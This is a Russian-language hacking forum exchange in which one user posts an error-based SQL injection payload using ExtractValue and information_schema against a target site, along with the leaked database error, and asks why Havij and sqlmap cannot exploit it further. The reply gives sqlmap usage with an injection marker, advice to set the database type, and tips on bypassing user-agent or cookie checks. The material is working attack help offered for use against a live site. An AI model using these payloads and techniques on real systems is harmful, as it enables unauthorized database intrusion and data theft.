Цитата:
Сообщение от xivi00
Есть скуля site.com/'
кртиться через error baze site.com/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1
вот вывод Erreur SQL : XPATH syntax error: ':SESSION_STATUS' (1105)
SELECT apres FROM `sos`.`redirection` WHERE LCID=2057 AND avant = '/'or(ExtractValue(1,concat(0x3a,(select+table_name/**/from/**/information_schema.tables/**/limit/**/24,1))))='1'
------------------------------------------------------------------------------------
но немогу не хавиджем не sqlmap ом раскрутить пробовал все уровни риски нечего, неоднаивестная миру программа не крутит, в чем может быть причина?
|
А желательно бы запрос скинуть с sqlmap'а. Обычно в уязвимом в месте без параметров ставиться *. Запрос получиться примерно таким:
Код:
sqlmap -u "site.com/*"
Желательно сразу указать тип БД. Еще бывает такое, что сайт проверяет, например, user_agent, или необходимые куки. Попробуй курлом отправить запрос и посмотри чего сайт скажет.